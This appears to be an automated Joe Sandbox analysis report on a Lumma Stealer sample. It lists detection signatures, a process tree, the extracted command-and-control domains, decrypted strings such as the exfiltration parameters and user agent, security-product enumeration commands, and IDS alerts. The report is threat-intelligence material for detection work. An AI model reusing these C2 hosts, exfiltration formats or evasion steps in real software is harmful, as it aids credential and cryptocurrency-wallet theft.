Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qnUFsmyxMm.exe

Overview

General Information

Sample name:qnUFsmyxMm.exe
renamed because original name is a hash value
Original sample name:a00f1411626bdf8860a00a2ee9f77709.exe
Analysis ID:1583036
MD5:a00f1411626bdf8860a00a2ee9f77709
SHA1:cf1dca091b73e2c9fd8528a90cb66a68d7ddd744
SHA256:39b753a793c07fe13d25dcb2e429cdadb40880fe3b86480a899f4898aaa2f1b6
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • qnUFsmyxMm.exe (PID: 6464 cmdline: "C:\Users\user\Desktop\qnUFsmyxMm.exe" MD5: A00F1411626BDF8860A00A2EE9F77709)
    • GWFNGPZJFQA2LD103N7W76JNMRKLK.exe (PID: 5588 cmdline: "C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" MD5: C89C55FE25372BFBF8B9264A647C144B)
      • GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp (PID: 428 cmdline: "C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$1044E,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
        • GWFNGPZJFQA2LD103N7W76JNMRKLK.exe (PID: 4436 cmdline: "C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENT MD5: C89C55FE25372BFBF8B9264A647C144B)
          • GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp (PID: 3372 cmdline: "C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$20474,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
            • timeout.exe (PID: 1960 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 5004 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5556 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 6784 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 3224 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7104 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5492 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 2232 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5236 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 2584 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 7016 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6412 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 6692 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 712 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7152 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 1356 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 1640 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 1844 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5348 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • ColorStreamLib.exe (PID: 3940 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe" MD5: A42E953364198E087438838FD14040E7)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["grannyejh.lat", "crosshuaht.lat", "necklacebudi.lat", "rapeflowwj.lat", "energyaffai.lat", "discokeyus.lat", "leeryspcieu.click", "sustainskelet.lat", "aspecteirs.lat"]}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.3872846044.0000000000D70000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.3894490335.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.3894545007.0000000000D70000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.3858760884.0000000000D60000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 8 entries
                SourceRuleDescriptionAuthorStrings
                0.2.qnUFsmyxMm.exe.790000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-01T16:53:57.048510+010020283713Unknown Traffic192.168.2.549975172.67.219.133443TCP
                  2025-01-01T16:53:58.058458+010020283713Unknown Traffic192.168.2.549976172.67.219.133443TCP
                  2025-01-01T16:53:59.321990+010020283713Unknown Traffic192.168.2.549977172.67.219.133443TCP
                  2025-01-01T16:54:00.998875+010020283713Unknown Traffic192.168.2.549978172.67.219.133443TCP
                  2025-01-01T16:54:02.394749+010020283713Unknown Traffic192.168.2.549979172.67.219.133443TCP
                  2025-01-01T16:54:04.150189+010020283713Unknown Traffic192.168.2.549980172.67.219.133443TCP
                  2025-01-01T16:54:05.523949+010020283713Unknown Traffic192.168.2.549981172.67.219.133443TCP
                  2025-01-01T16:54:07.689652+010020283713Unknown Traffic192.168.2.549982172.67.219.133443TCP
                  2025-01-01T16:54:08.712519+010020283713Unknown Traffic192.168.2.549983188.114.97.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-01T16:53:57.543982+010020546531A Network Trojan was detected192.168.2.549975172.67.219.133443TCP
                  2025-01-01T16:53:58.549335+010020546531A Network Trojan was detected192.168.2.549976172.67.219.133443TCP
                  2025-01-01T16:54:08.175148+010020546531A Network Trojan was detected192.168.2.549982172.67.219.133443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-01T16:53:57.543982+010020498361A Network Trojan was detected192.168.2.549975172.67.219.133443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-01T16:53:58.549335+010020498121A Network Trojan was detected192.168.2.549976172.67.219.133443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-01T16:54:09.113380+010020084381A Network Trojan was detected188.114.97.3443192.168.2.549983TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-01T16:54:04.600845+010020480941Malware Command and Control Activity Detected192.168.2.549980172.67.219.133443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: qnUFsmyxMm.exeAvira: detected
                  Source: 0.2.qnUFsmyxMm.exe.790000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["grannyejh.lat", "crosshuaht.lat", "necklacebudi.lat", "rapeflowwj.lat", "energyaffai.lat", "discokeyus.lat", "leeryspcieu.click", "sustainskelet.lat", "aspecteirs.lat"]}
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeReversingLabs: Detection: 51%
                  Source: qnUFsmyxMm.exeVirustotal: Detection: 42%Perma Link
                  Source: qnUFsmyxMm.exeReversingLabs: Detection: 34%
                  Source: 0.2.qnUFsmyxMm.exe.790000.0.unpackString decryptor: rapeflowwj.lat
                  Source: 0.2.qnUFsmyxMm.exe.790000.0.unpackString decryptor: crosshuaht.lat
                  Source: 0.2.qnUFsmyxMm.exe.790000.0.unpackString decryptor: sustainskelet.lat
                  Source: 0.2.qnUFsmyxMm.exe.790000.0.unpackString decryptor: aspecteirs.lat
                  Source: 0.2.qnUFsmyxMm.exe.790000.0.unpackString decryptor: energyaffai.lat
                  Source: 0.2.qnUFsmyxMm.exe.790000.0.unpackString decryptor: necklacebudi.lat
                  Source: 0.2.qnUFsmyxMm.exe.790000.0.unpackString decryptor: discokeyus.lat
                  Source: 0.2.qnUFsmyxMm.exe.790000.0.unpackString decryptor: grannyejh.lat
                  Source: 0.2.qnUFsmyxMm.exe.790000.0.unpackString decryptor: leeryspcieu.click
                  Source: 0.2.qnUFsmyxMm.exe.790000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 0.2.qnUFsmyxMm.exe.790000.0.unpackString decryptor: TeslaBrowser/5.5
                  Source: 0.2.qnUFsmyxMm.exe.790000.0.unpackString decryptor: - Screen Resoluton:
                  Source: 0.2.qnUFsmyxMm.exe.790000.0.unpackString decryptor: - Physical Installed Memory:
                  Source: 0.2.qnUFsmyxMm.exe.790000.0.unpackString decryptor: Workgroup: -
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007A60F8 CryptUnprotectData,0_2_007A60F8
                  Source: qnUFsmyxMm.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49975 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49976 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49977 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49978 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49979 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49980 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49981 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49982 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49983 version: TLS 1.2
                  Source: qnUFsmyxMm.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Admin\Workspace\1724252660\Project\Release\Project.pdb source: qnUFsmyxMm.exe, 00000000.00000003.3787196856.0000000002796000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000000.2029041591.0000000000B4F000.00000002.00000001.01000000.00000003.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3980528943.0000000000B4F000.00000002.00000001.01000000.00000003.sdmp
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+2FDC4307h]0_2_007A60F8
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+000002A3h]0_2_007A60F8
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov esi, dword ptr [ebp-20h]0_2_0079B922
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edx, byte ptr [ecx]0_2_007BC981
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_007C9A70
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_007B3A00
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then jmp ecx0_2_007C9A00
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov byte ptr [esi], al0_2_007BDAB4
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov byte ptr [esi], al0_2_007BDAB4
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then cmp byte ptr [eax+ebx+09h], 00000000h0_2_007C6B50
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov word ptr [edi], ax0_2_0079D338
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 5E874B5Fh0_2_007B7380
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov eax, ebx0_2_007B7380
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-00000091h]0_2_007ACC00
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-4653A5D2h]0_2_007CEC00
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-1795116Dh]0_2_007CEC00
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-46B5D6C4h]0_2_007CD570
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov byte ptr [edx], al0_2_007AE870
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov esi, edx0_2_007AE870
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-39h]0_2_007AE870
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+20CBA957h]0_2_007A8857
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-04AB3DE7h]0_2_007B9030
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov edi, ebx0_2_007CE820
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], E785F9BAh0_2_007B70E0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then jmp edx0_2_007B309E
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_007BB950
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+00000098h]0_2_007BE145
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edx, byte ptr [ecx]0_2_007BE145
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh0_2_007B8938
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]0_2_007B4120
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx ebx, bx0_2_007B4120
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov ebx, eax0_2_00795910
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov ebp, eax0_2_00795910
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh0_2_007B8912
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edx, byte ptr [ecx]0_2_007BC981
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov word ptr [eax], cx0_2_007A59D0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+69CAA957h]0_2_007A59D0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh0_2_007B9AF0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_007C42E0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0079C377
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_0079C377
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+0Eh]0_2_007AD360
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov word ptr [ebx], ax0_2_007AD360
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then add edx, eax0_2_00798B50
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov esi, edx0_2_007CC33D
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov eax, dword ptr [edi+10h]0_2_007CD330
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then cmp dword ptr [ebp+esi*8+00h], E785F9BAh0_2_007BABF8
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then cmp dword ptr [ebp+esi*8+00h], E785F9BAh0_2_007BABF8
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov edx, ecx0_2_007993C0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov byte ptr [esi], al0_2_007BDAAF
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]0_2_007B43B0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_00792B90
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_007BB380
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov eax, dword ptr [edi+10h]0_2_007CCC70
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov ecx, edi0_2_00797460
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E785F9BAh0_2_007C7450
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-46B5D6C4h]0_2_007CE490
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov eax, dword ptr [edi+10h]0_2_007CCD60
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_00798D50
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]0_2_007B4550
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+69CAA75Bh]0_2_007A7D1A
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh0_2_007B9D1E
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]0_2_007B45F7
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov eax, dword ptr [007D4118h]0_2_007B4DC0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh0_2_007B8DC5
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_007BBE10
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+69CAA6A7h]0_2_007C76E0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]0_2_00792ED0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], E785F9BAh0_2_007BAEB3
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov eax, dword ptr [edi+10h]0_2_007CCEA0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov eax, dword ptr [edi+10h]0_2_007CCF50
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov eax, dword ptr [edi+10h]0_2_007CCFE0
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], E785F9BAh0_2_007BAFDB
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_007BE784

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49982 -> 172.67.219.133:443
                  Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49980 -> 172.67.219.133:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49975 -> 172.67.219.133:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49975 -> 172.67.219.133:443
                  Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49976 -> 172.67.219.133:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49976 -> 172.67.219.133:443
                  Source: Malware configuration extractorURLs: grannyejh.lat
                  Source: Malware configuration extractorURLs: crosshuaht.lat
                  Source: Malware configuration extractorURLs: necklacebudi.lat
                  Source: Malware configuration extractorURLs: rapeflowwj.lat
                  Source: Malware configuration extractorURLs: energyaffai.lat
                  Source: Malware configuration extractorURLs: discokeyus.lat
                  Source: Malware configuration extractorURLs: leeryspcieu.click
                  Source: Malware configuration extractorURLs: sustainskelet.lat
                  Source: Malware configuration extractorURLs: aspecteirs.lat
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 172.67.219.133 172.67.219.133
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49975 -> 172.67.219.133:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49980 -> 172.67.219.133:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49981 -> 172.67.219.133:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49977 -> 172.67.219.133:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49982 -> 172.67.219.133:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49983 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49976 -> 172.67.219.133:443
